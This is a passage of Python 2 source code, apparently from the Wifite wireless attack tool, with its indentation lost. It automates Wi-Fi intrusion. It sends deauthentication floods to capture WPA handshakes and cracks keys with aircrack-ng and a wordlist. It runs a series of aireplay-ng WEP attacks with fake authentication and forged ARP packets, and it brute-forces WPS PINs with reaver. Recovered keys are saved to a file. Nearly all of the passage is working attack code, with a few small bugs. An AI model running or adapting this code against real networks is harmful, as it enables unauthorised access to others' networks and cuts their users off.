(GR+sec_to_hms(WPA_ATTACK_TIMEOUT)+W, G, W, G+target.ssid+W)
got_handshake = False
seconds_running = 0
target_clients = clients[:]
client_index = -1
# Deauth and check-for-handshake loop
while not got_handshake and (WPA_ATTACK_TIMEOUT <= 0 or seconds_running < WPA_ATTACK_TIMEOUT):
time.sleep(1)
seconds_running += 1
print " \r",
print ' %s listening for handshake...\r' % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W),
stdout.flush()
if seconds_running % WPA_DEAUTH_TIMEOUT == 0:
# Send deauth packets via aireplay-ng
cmd = ['aireplay-ng',
'-0', # Attack method (Deauthentication)
'1', # Number of packets to send
'-a', target.bssid]
client_index += 1
if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients):
print " %s sending 1 deauth to %s*broadcast*%s..." % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W),
client_index = -1
else:
print " %s sending 1 deauth to %s... " % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, \
G+target_clients[client_index].bssid+W),
cmd.append('-h')
cmd.append(target_clients[client_index].bssid)
cmd.append(iface)
stdout.flush()
# Send deauth packets via aireplay, wait for them to complete.
proc_deauth = Popen(cmd, stdout=DN, stderr=DN)
proc_deauth.wait()
print "sent\r",
stdout.flush()
# Copy current dump file for consistency
if not os.path.exists(temp + 'wpa-01.cap'): continue
copy(temp + 'wpa-01.cap', temp + 'wpa-01.cap.temp')
# Save copy of cap file (for debugging)
#remove_file('/root/new/wpa-01.cap')
#copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap')
# Check for handshake
if has_handshake(target, temp + 'wpa-01.cap.temp'):
got_handshake = True
try: os.mkdir(WPA_HANDSHAKE_DIR + os.sep)
except OSError: pass
# Kill the airodump and aireplay processes
send_interrupt(proc_read)
send_interrupt(proc_deauth)
# Save a copy of the handshake
rename(temp + 'wpa-01.cap.temp', save_as)
print '\n %s %shandshake captured%s! saved as "%s"' % (GR+sec_to_hms(seconds_running)+W, G, W, G+save_as+W)
WPA_FINDINGS.append('%s (%s) handshake captured' % (target.ssid, target.bssid))
WPA_FINDINGS.append('saved as %s' % (save_as))
WPA_FINDINGS.append('')
# Strip handshake if needed
if WPA_STRIP_HANDSHAKE: strip_handshake(save_as)
# Add the filename and SSID to the list of 'to-crack'
# Cracking will be handled after all attacks are finished.
WPA_CAPS_TO_CRACK.append(CapFile(save_as, target.ssid, target.bssid))
break # Break out of while loop
# No handshake yet
os.remove(temp + 'wpa-01.cap.temp')
# Check the airodump output file for new clients
for client in parse_csv(temp + 'wpa-01.csv')[1]:
if client.station != target.bssid: continue
new_client = True
for c in target_clients:
if client.bssid == c.bssid:
new_client = False
break
if new_client:
print " %s %snew client%s found: %s " % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W, \
G+client.bssid+W)
target_clients.append(client)
# End of Handshake wait loop.
if not got_handshake:
print R+' [0:00:00]'+O+' unable to capture handshake in time'+W
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WPA handshake capture interrupted'+W
if attack_interrupted_prompt():
remove_airodump_files(temp + 'wpa')
send_interrupt(proc_read)
send_interrupt(proc_deauth)
print ''
exit_gracefully(0)
# clean up
remove_airodump_files(temp + 'wpa')
send_interrupt(proc_read)
send_interrupt(proc_deauth)
return got_handshake
def has_handshake_tshark(target, capfile):
"""
Uses TShark to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if program_exists('tshark'):
# Call Tshark to return list of EAPOL packets in cap file.
cmd = ['tshark',
'-r', capfile, # Input file
'-R', 'eapol', # Filter (only EAPOL packets)
'-n'] # Do not resolve names (MAC vendors)
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
lines = proc.communicate()[0].split('\n')
# Get list of all clients in cap file
clients = []
for line in lines:
if line.find('appears to have been cut short') != -1 or line.find('Running as user "root"') != -1 or line.strip() == '':
continue
while line.startswith(' '): line = line[1:]
while line.find(' ') != -1: line = line.replace(' ', ' ')
fields = line.split(' ')
src = fields[2].lower()
dst = fields[4].lower()
if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst)
elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src)
# Check each client for a handshake
for client in clients:
msg_num = 1 # Index of message in 4-way handshake (starts at 1)
for line in lines:
if line.find('appears to have been cut short') != -1: continue
if line.find('Running as user "root"') != -1: continue
if line.strip() == '': continue
# Sanitize tshark's output, separate into fields
while line[0] == ' ': line = line[1:]
while line.find(' ') != -1: line = line.replace(' ', ' ')
fields = line.split(' ')
# Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake.
# This catches this glitch and fixes it.
if len(fields) < 8:
continue
elif len(fields) == 8:
fields.append('(msg')
fields.append('3/4)')
src = fields[2].lower() # Source MAC address
dst = fields[4].lower() # Destination MAC address
#msg = fields[9][0] # The message number (1, 2, 3, or 4)
msg = fields[-1][0]
# First, third msgs in 4-way handshake are from the target to client
if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue
# Second, fourth msgs in 4-way handshake are from client to target
elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue
# The messages must appear in sequential order.
try:
if int(msg) != msg_num: continue
except ValueError: continue
msg_num += 1
# We need the first 4 messages of the 4-way handshake
# Although aircrack-ng cracks just fine with only 3 of the messages...
if msg_num >= 4:
return True
return False
def has_handshake_cowpatty(target, capfile, nonstrict=True):
"""
Uses cowpatty to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if not program_exists('cowpatty'): return False
# Call cowpatty to check if capfile contains a valid handshake.
cmd = ['cowpatty',
'-r', capfile, # input file
'-s', target.ssid, # SSID
'-c'] # Check for handshake
# Uses frames 1, 2, or 3 for key attack
if nonstrict: cmd.append('-2')
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
response = proc.communicate()[0]
if response.find('incomplete four-way handshake exchange') != -1:
return False
elif response.find('Unsupported or unrecognized pcap file.') != -1:
return False
elif response.find('Unable to open capture file: Success') != -1:
return False
return True
def has_handshake_pyrit(target, capfile):
"""
Uses pyrit to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if not program_exists('pyrit'): return False
# Call pyrit to "Analyze" the cap file's handshakes.
cmd = ['pyrit',
'-r', capfile,
'analyze']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
hit_essid = False
for line in proc.communicate()[0].split('\n'):
# Iterate over every line of output by Pyrit
if line == '' or line == None: continue
if line.find("AccessPoint") != -1:
hit_essid = (line.find("('" + target.ssid + "')") != -1) and \
(line.lower().find(target.bssid.lower()) != -1)
#hit_essid = (line.lower().find(target.bssid.lower()))
else:
# If Pyrit says it's good or workable, it's a valid handshake.
if hit_essid and (line.find(', good, ') != -1 or \
line.find(', workable, ') != -1):
# or line.find(', bad, ') != -1):
return True
return False
def has_handshake_aircrack(target, capfile):
"""
Uses aircrack-ng to check for handshake.
Returns True if found, False otherwise.
"""
if not program_exists('aircrack-ng'): return False
crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile
proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True)
proc_crack.wait()
txt = proc_crack.communicate()[0]
return (txt.find('Passphrase not in dictionary') != -1)
def has_handshake(target, capfile):
"""
Checks if .cap file contains a handshake.
Returns True if handshake is found, False otherwise.
"""
valid_handshake = True
tried = False
if WPA_HANDSHAKE_TSHARK:
tried = True
valid_handshake = has_handshake_tshark(target, capfile)
if valid_handshake and WPA_HANDSHAKE_COWPATTY:
tried = True
valid_handshake = has_handshake_cowpatty(target, capfile)
# Use CowPatty to check for handshake.
if valid_handshake and WPA_HANDSHAKE_COWPATTY:
tried = True
valid_handshake = has_handshake_cowpatty(target, capfile)
# Check for handshake using Pyrit if applicable
if valid_handshake and WPA_HANDSHAKE_PYRIT:
tried = True
valid_handshake = has_handshake_pyrit(target, capfile)
# Check for handshake using aircrack-ng
if valid_handshake and WPA_HANDSHAKE_AIRCRACK:
tried = True
valid_handshake = has_handshake_aircrack(target, capfile)
if tried: return valid_handshake
print R+' [!]'+O+' unable to check for handshake: all handshake options are disabled!'
exit_gracefully(1)
def strip_handshake(capfile):
"""
Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file
File in location 'capfile' is overwritten!
"""
output_file = capfile
if program_exists('pyrit'):
cmd = ['pyrit',
'-r', capfile,
'-o', output_file,
'strip']
call(cmd,stdout=DN, stderr=DN)
elif program_exists('tshark'):
# strip results with tshark
cmd = ['tshark',
'-r', capfile, # input file
'-R', 'eapol || wlan_mgt.tag.interpretation', # filter
'-w', capfile + '.temp'] # output file
proc_strip = call(cmd, stdout=DN, stderr=DN)
rename(capfile + '.temp', output_file)
else:
print R+" [!]"+O+" unable to strip .cap file: neither pyrit nor tshark were found"+W
def save_cracked(bssid, ssid, key, encryption):
"""
Saves cracked access point key and info to a file.
"""
sep = chr(0)
fout = open('cracked.txt', 'a')
fout.write(bssid + sep + ssid + sep + key + sep + encryption + '\n')
fout.flush()
fout.close()
def load_cracked():
"""
Loads info about cracked access points into list, returns list.
"""
result = []
if not os.path.exists('cracked.txt'): return result
fin = open('cracked.txt', 'r')
lines = fin.read().split('\n')
fin.close()
for line in lines:
fields = line.split(chr(0))
if len(fields) <= 3: continue
tar = Target(fields[0], '', '', '', fields[3], fields[1])
tar.key = fields[2]
result.append(tar)
return result
##########################
# WPA CRACKING FUNCTIONS #
##########################
def wpa_crack(capfile):
"""
Cracks cap file using aircrack-ng
This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat,
they can do so manually.
"""
if WPA_DICTIONARY == '':
print R+' [!]'+O+' no WPA dictionary found! use -dict <file> command-line argument'+W
return False
print GR+' [0:00:00]'+W+' cracking %s with %s' % (G+capfile.ssid+W, G+'aircrack-ng'+W)
start_time = time.time()
cracked = False
remove_file(temp + 'out.out')
remove_file(temp + 'wpakey.txt')
cmd = ['aircrack-ng',
'-a', '2', # WPA crack
'-w', WPA_DICTIONARY, # Wordlist
'-l', temp + 'wpakey.txt', # Save key to file
'-b', capfile.bssid, # BSSID of target
capfile.filename]
proc = Popen(cmd, stdout=open(temp + 'out.out', 'a'), stderr=DN)
try:
kt = 0 # Keys tested
kps = 0 # Keys per second
while True:
time.sleep(1)
if proc.poll() != None: # aircrack stopped
if os.path.exists(temp + 'wpakey.txt'):
# Cracked
inf = open(temp + 'wpakey.txt')
key = inf.read().strip()
inf.close()
WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % (G+capfile.ssid+W, G+capfile.bssid+W, C+key+W))
WPA_FINDINGS.append('')
save_cracked(capfile.bssid, capfile.ssid, key, 'WPA')
print GR+'\n [+]'+W+' cracked %s (%s)!' % (G+capfile.ssid+W, G+capfile.bssid+W)
print GR+' [+]'+W+' key: "%s"\n' % (C+key+W)
cracked = True
else:
# Did not crack
print R+'\n [!]'+R+'crack attempt failed'+O+': passphrase not in dictionary'+W
break
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
outf = open(temp + 'out.out', 'w')
outf.close()
for line in lines:
i = line.find(']')
j = line.find('keys tested', i)
if i != -1 and j != -1:
kts = line[i+2:j-1]
try: kt = int(kts)
except ValueError: pass
i = line.find('(')
j = line.find('k/s)', i)
if i != -1 and j != -1:
kpss = line[i+1:j-1]
try: kps = float(kpss)
except ValueError: pass
print "\r %s %s keys tested (%s%.2f keys/sec%s) " % \
(GR+sec_to_hms(time.time() - start_time)+W, G+add_commas(kt)+W, G, kps, W),
stdout.flush()
except KeyboardInterrupt: print R+'\n (^C)'+O+' WPA cracking interrupted'+W
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
return cracked
def add_commas(n):
"""
Receives integer n, returns string representation of n with commas in thousands place.
I'm sure there's easier ways of doing this... but meh.
"""
strn = str(n)
lenn = len(strn)
i = 0
result = ''
while i < lenn:
if (lenn - i) % 3 == 0 and i != 0: result += ','
result += strn[i]
i += 1
return result
#################
# WEP FUNCTIONS #
#################
def attack_wep(iface, target, clients):
"""
Attacks WEP-encrypted network.
Returns True if key was successfully found, False otherwise.
"""
global WEP_TIMEOUT, TARGETS_REMAINING
if WEP_TIMEOUT <= 0: WEP_TIMEOUT = -1
total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0)
if not WEP_ARP_REPLAY: total_attacks -= 1
if not WEP_CHOPCHOP: total_attacks -= 1
if not WEP_FRAGMENT: total_attacks -= 1
if not WEP_CAFFELATTE: total_attacks -= 1
if not WEP_P0841: total_attacks -= 1
if not WEP_HIRTE: total_attacks -= 1
if total_attacks <= 0:
print R+' [!]'+O+' unable to initiate WEP attacks: no attacks are selected!'
return False
remaining_attacks = total_attacks
print ' %s preparing attack "%s" (%s)' % \
(GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W, G+target.bssid+W)
interrupted_count = 0
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
# Start airodump process to capture packets
cmd_airodump = ['airodump-ng',
'-w', temp + 'wep', # Output file name (wep-01.cap, wep-01.csv)
'-c', target.channel, # Wireless channel
'--bssid', target.bssid,
iface]
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
proc_aireplay = None
proc_aircrack = None
successful = False # Flag for when attack is successful
started_cracking = False # Flag for when we have started aircrack-ng
client_mac = '' # The client mac we will send packets to/from
total_ivs = 0
ivs = 0
last_ivs = 0
for attack_num in xrange(0, 6):
# Skip disabled attacks
if attack_num == 0 and not WEP_ARP_REPLAY: continue
elif attack_num == 1 and not WEP_CHOPCHOP: continue
elif attack_num == 2 and not WEP_FRAGMENT: continue
elif attack_num == 3 and not WEP_CAFFELATTE: continue
elif attack_num == 4 and not WEP_P0841: continue
elif attack_num == 5 and not WEP_HIRTE: continue
remaining_attacks -= 1
try:
if wep_fake_auth(iface, target, sec_to_hms(WEP_TIMEOUT)):
# Successful fake auth
client_mac = THIS_MAC
elif not WEP_IGNORE_FAKEAUTH:
send_interrupt(proc_aireplay)
send_interrupt(proc_airodump)
print R+' [!]'+O+' unable to fake-authenticate with target'
print R+' [!]'+O+' to skip this speed bump, select "ignore-fake-auth" at command-line'
return False
remove_file(temp + 'arp.cap')
# Generate the aireplay-ng arguments based on attack_num and other params
cmd = get_aireplay_command(iface, attack_num, target, clients, client_mac)
if cmd == '': continue
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s attacking "%s" via' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W),
if attack_num == 0: print G+'arp-replay',
elif attack_num == 1: print G+'chop-chop',
elif attack_num == 2: print G+'fragmentation',
elif attack_num == 3: print G+'caffe-latte',
elif attack_num == 4: print G+'p0841',
elif attack_num == 5: print G+'hirte',
print 'attack'+W
print ' %s captured %s%d%s ivs @ %s iv/sec' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G, total_ivs, W, G+'0'+W),
stdout.flush()
time.sleep(1)
if attack_num == 1:
# Send a deauth packet to broadcast and all clients *just because!*
wep_send_deauths(iface, target, clients)
last_deauth = time.time()
replaying = False
time_started = time.time()
while time.time() - time_started < WEP_TIMEOUT:
# time.sleep(5)
for time_count in xrange(0, 6):
if WEP_TIMEOUT == -1:
current_hms = "[endless]"
else:
current_hms = sec_to_hms(WEP_TIMEOUT - (time.time() - time_started))
print "\r %s\r" % (GR+current_hms+W),
stdout.flush()
time.sleep(1)
# Calculates total seconds remaining
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print "\r ",
print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \
(GR+current_hms+W, G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
if ivs - last_ivs == 0 and time.time() - last_deauth > 30:
print "\r %s deauthing to generate packets..." % (GR+current_hms+W),
wep_send_deauths(iface, target, clients)
print "done\r",
last_deauth = time.time()
last_ivs = ivs
stdout.flush()
if total_ivs + ivs >= WEP_CRACK_AT_IVS and not started_cracking:
# Start cracking
cmd = ['aircrack-ng',
'-a', '1',
'-l', temp + 'wepkey.txt']
#temp + 'wep-01.cap']
# Append all .cap files in temp directory (in case we are resuming)
for file in os.listdir(temp):
if file.startswith('wep-') and file.endswith('.cap'):
cmd.append(temp + file)
print "\r %s started %s (%sover %d ivs%s)" % (GR+current_hms+W, G+'cracking'+W, G, WEP_CRACK_AT_IVS, W)
proc_aircrack = Popen(cmd, stdout=DN, stderr=DN)
started_cracking = True
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print '\n\n %s %s %s (%s)! key: "%s"' % (current_hms, G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
try: os.kill(proc_aireplay, SIGTERM)
except: pass
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
time.sleep(0.5)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Check if aireplay is still executing
if proc_aireplay.poll() == None:
if replaying: print ', '+G+'replaying \r'+W,
elif attack_num == 1 or attack_num == 2: print ', waiting for packet \r',
stdout.flush()
continue
# At this point, aireplay has stopped
if attack_num != 1 and attack_num != 2:
print '\r %s attack failed: %saireplay-ng exited unexpectedly%s' % (R+current_hms, O, W)
break # Break out of attack's While loop
# Check for a .XOR file (we expect one when doing chopchop/fragmentation
xor_file = ''
for filename in sorted(os.listdir(temp)):
if filename.lower().endswith('.xor'): xor_file = temp + filename
if xor_file == '':
print '\r %s attack failed: %sunable to generate keystream %s' % (R+current_hms, O, W)
break
remove_file(temp + 'arp.cap')
cmd = ['packetforge-ng',
'-0',
'-a', targets.bssid,
'-h', client_mac,
'-k', '192.168.1.2',
'-l', '192.168.1.100',
'-y', xor_file,
'-w', temp + 'arp.cap',
iface]
proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN)
proc_pforge.wait()
forged_packet = proc_pforge.communicate()[0]
remove_file(xor_file)
if forged_packet == None: result = ''
forged_packet = forged_packet.strip()
if not forged_packet.find('Wrote packet'):
print "\r %s attack failed: unable to forget ARP packet %s" % (R+current_hms+O, w)
break
# We were able to forge a packet, so let's replay it via aireplay-ng
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-r', temp + 'arp.cap', # Used the forged ARP packet
'-F', # Select the first packet
iface]
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s forged %s! %s... ' % (GR+current_hms+W, G+'arp packet'+W, G+'replaying'+W)
replaying = True
# After the attacks, if we are already cracking, wait for the key to be found!
while started_cracking: # ivs > WEP_CRACK_AT_IVS:
time.sleep(5)
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print GR+" [endless]"+W+" captured %s%d%s ivs, iv/sec: %s%d%s \r" % \
(G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
last_ivs = ivs
stdout.flush()
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print GR+'\n\n [endless] %s %s (%s)! key: "%s"' % (G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Keyboard interrupt during attack
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WEP attack interrupted\n'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
if proc_aircrack != None:
send_interrupt(proc_aircrack)
options = []
selections = []
if remaining_attacks > 0:
options.append('%scontinue%s attacking this target (%d remaining WEP attack%s)' % \
(G, W, (remaining_attacks), 's' if remaining_attacks != 1 else ''))
selections.append(G+'c'+W)
if TARGETS_REMAINING > 0:
options.append('%sskip%s this target, move onto next target (%d remaining target%s)' % \
(O, W, TARGETS_REMAINING, 's' if TARGETS_REMAINING != 1 else ''))
selections.append(O+'s'+W)
options.append('%sexit%s the program completely' % (R, W))
selections.append(R+'e'+W)
if len(options) > 1:
# Ask user what they want to do, Store answer in "response"
print GR+' [+]'+W+' what do you want to do?'
response = ''
while response != 'c' and response != 's' and response != 'e':
for option in options:
print ' %s' % option
response = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % (', '.join(selections))).lower()[0]
else:
response = 'e'
if response == 'e' or response == 's':
# Exit or skip target (either way, stop this attack)
if WEP_SAVE:
# Save packets
save_as = re.sub(r'[^a-zA-Z0-9]', '', target.ssid) + '_' + target.bssid.replace(':', '-') + '.cap'+W
try: rename(temp + 'wep-01.cap', save_as)
except OSError: print R+' [!]'+O+' unable to save capture file!'+W
else: print GR+' [+]'+W+' packet capture '+G+'saved'+W+' to '+G+save_as+W
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
print ''
if response == 'e':
exit_gracefully(0)
return
elif response == 'c':
# Continue attacks
# Need to backup temp/wep-01.cap and remove airodump files
i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
i += 1
copy(temp + "wep-01.cap", temp + 'wep-' + str(i) + '.cap')
remove_airodump_files(temp + 'wep')
# Need to restart airodump-ng, as it's been interrupted/killed
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
# Say we haven't started cracking yet, so we re-start if needed.
started_cracking = False
# Reset IVs counters for proper behavior
total_ivs += ivs
ivs = 0
last_ivs = 0
# Also need to remember to crack "temp/*.cap" instead of just wep-01.cap
pass
if successful:
print GR+'\n [0:00:00]'+W+' attack complete: '+G+'success!'+W
else:
print GR+'\n [0:00:00]'+W+' attack complete: '+R+'failure'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
def wep_fake_auth(iface, target, time_to_display):
"""
Attempt to (falsely) authenticate with a WEP access point.
Gives 3 seconds to make each 5 authentication attempts.
Returns True if authentication was successful, False otherwise.
"""
max_wait = 3 # Time, in seconds, to allow each fake authentication
max_attempts = 5 # Number of attempts to make
for fa_index in xrange(1, max_attempts + 1):
print '\r ',
print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \
(GR+time_to_display+W, G, W, fa_index, max_attempts),
stdout.flush()
cmd = ['aireplay-ng',
'-1', '0', # Fake auth, no delay
'-a', target.bssid,
'-T', '1'] # Make 1 attempt
if target.ssid != '':
cmd.append('-e')
cmd.append(target.ssid)
cmd.append(iface)
proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN)
started = time.time()
while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass
if time.time() - started > max_wait:
send_interrupt(proc_fakeauth)
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
result = proc_fakeauth.communicate()[0].lower()
if result.find('switching to shared key') != -1 or \
result.find('rejects open system'): pass
# TODO Shared Key Authentication (SKA)
if result.find('association successful') != -1:
print G+'success!'+W
return True
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
print ''
return False
def get_aireplay_command(iface, attack_num, target, clients, client_mac):
"""
Returns aireplay-ng command line arguments based on parameters.
"""
cmd = ''
if attack_num == 0:
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-x', str(WEP_PPS)] # Packets per second
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 1:
cmd = ['aireplay-ng',
'--chopchop',
'-b', target.bssid,
'-x', str(WEP_PPS), # Packets per second
'-m', '60', # Minimum packet length (bytes)
'-n', '82', # Maxmimum packet length
'-F'] # Automatically choose the first packet
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 2:
cmd = ['aireplay-ng',
'--fragment',
'-b', target.bssid,
'-x', str(WEP_PPS), # Packets per second
'-m', '100', # Minimum packet length (bytes)
'-F'] # Automatically choose the first packet
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 3:
cmd = ['aireplay-ng',
'--caffe-latte',
'-b', target.bssid]
if len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 4:
cmd = ['aireplay-ng',
'--interactive',
'-b', target.bssid,
'-c', 'ff:ff:ff:ff:ff:ff',
'-t', '1', # Only select packets with ToDS bit set
'-x', str(WEP_PPS), # Packets per second
'-F', # Automatically choose the first packet
'-p', '0841']
cmd.append(iface)
elif attack_num == 5:
if len(clients) == 0:
print R+' [0:00:00] unable to carry out hirte attack: '+O+'no clients'
return ''
cmd = ['aireplay-ng',
'--cfrag',
'-h', clients[0].bssid,
iface]
return cmd
def wep_send_deauths(iface, target, clients):
"""
Sends deauth packets to broadcast and every client.
"""
# Send deauth to broadcast
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', target.bssid,
iface]
call(cmd, stdout=DN, stderr=DN)
# Send deauth to every client
for client in clients:
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', target.bssid,
'-h', client.bssid,
iface]
call(cmd, stdout=DN, stderr=DN)
#################
# WPS FUNCTIONS #
#################
def wps_attack(iface, target):
"""
Mounts attack against target on iface.
Uses "reaver" to attempt to brute force the PIN.
Once PIN is found, PSK can be recovered.
PSK is displayed to user and added to WPS_FINDINGS
"""
print GR+' [0:00:00]'+W+' initializing %sWPS PIN attack%s on %s' % \
(G, W, G+target.ssid+W+' ('+G+target.bssid+W+')'+W)
cmd = ['reaver',
'-i', iface,
'-b', target.bssid,
'-o', temp + 'out.out', # Dump output to file to be monitored
'-a', # auto-detect best options, auto-resumes sessions, doesn't require input!
'-c', target.channel,
# '--ignore-locks',
'-vv'] # verbose output
proc = Popen(cmd, stdout=DN, stderr=DN)
cracked = False # Flag for when password/pin is found
percent = 'x.xx%' # Percentage complete
aps = 'x' # Seconds per attempt
time_started = time.time()
last_success = time_started # Time of last successful attempt
last_pin = '' # Keep track of last pin tried (to detect retries)
retries = 0 # Number of times we have attempted this PIN
tries_total = 0 # Number of times we have attempted all pins
tries = 0 # Number of successful attempts
pin = ''
key = ''
try:
while not cracked:
time.sleep(1)
if proc.poll() != None:
# Process stopped: Cracked? Failed?
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
for line in lines:
# When it's cracked:
if line.find("WPS PIN: '") != -1:
pin = line[line.find("WPS PIN: '") + 10:-1]
if line.find("WPA PSK: '") != -1:
key = line[line.find("WPA PSK: '") + 10:-1]
cracked = True
break
if not os.path.exists(temp + 'out.out'): continue
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
for line in lines:
if line.strip() == '': continue
# Status
if line.find(' complete @ ') != -1 and len(line) > 8:
percent = line.split(' ')[1]
i = line.find(' (')
j = line.find(' seconds/', i)
if i != -1 and j != -1: aps = line[i+2:j]
# PIN attempt
elif line.find(' Trying pin ') != -1:
pin = line.strip().split(' ')[-1]
if pin == last_pin:
retries += 1
elif tries_total == 0:
last_pin = pin
tries_total -= 1
else:
last_success = time.time()
tries += 1
last_pin = pin
retries = 0
tries_total += 1
# Warning
elif line.endswith('10 failed connections in a row'): pass
# Check for PIN/PSK
elif line.find("WPS PIN: '") != -1:
pin = line[line.find("WPS PIN: '") + 10:-1]
elif line.find("WPA PSK: '") != -1:
key = line[line.find("WPA PSK: '") + 10:-1]
cracked = True
if cracked: break
print ' %s WPS attack, %s success/ttl,' % \
(GR+sec_to_hms(time.time()-time_started)+W, \
G+str(tries)+W+'/'+O+str(tries_total)+W),
if percent == 'x.xx%' and aps == 'x': print '\r',
else:
print '%s complete (%s sec/att) \r' % (G+percent+W, G+aps+W),
if WPS_TIMEOUT > 0 and (time.time() - last_success) > WPS_TIMEOUT:
print R+'\n [!]'+O+' unable to complete successful try in %d seconds' % (WPS_TIMEOUT)
print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
break
if WPS_MAX_RETRIES > 0 and retries > WPS_MAX_RETRIES:
print R+'\n [!]'+O+' unable to complete successful try in %d retries' % (WPS_MAX_RETRIES)
print R+' [+]'+O+' the access point may have WPS-locking enabled, or is too far away'+W
print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
break
if WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and (float(tries) / tries_total) < WPS_RATIO_THRESHOLD:
print R+'\n [!]'+O+' successful/total attempts ratio was too low (< %.2f)' % (WPS_RATIO_THRESHOLD)
print R+' [+]'+W+' skipping %s' % (G+target.ssid+W)
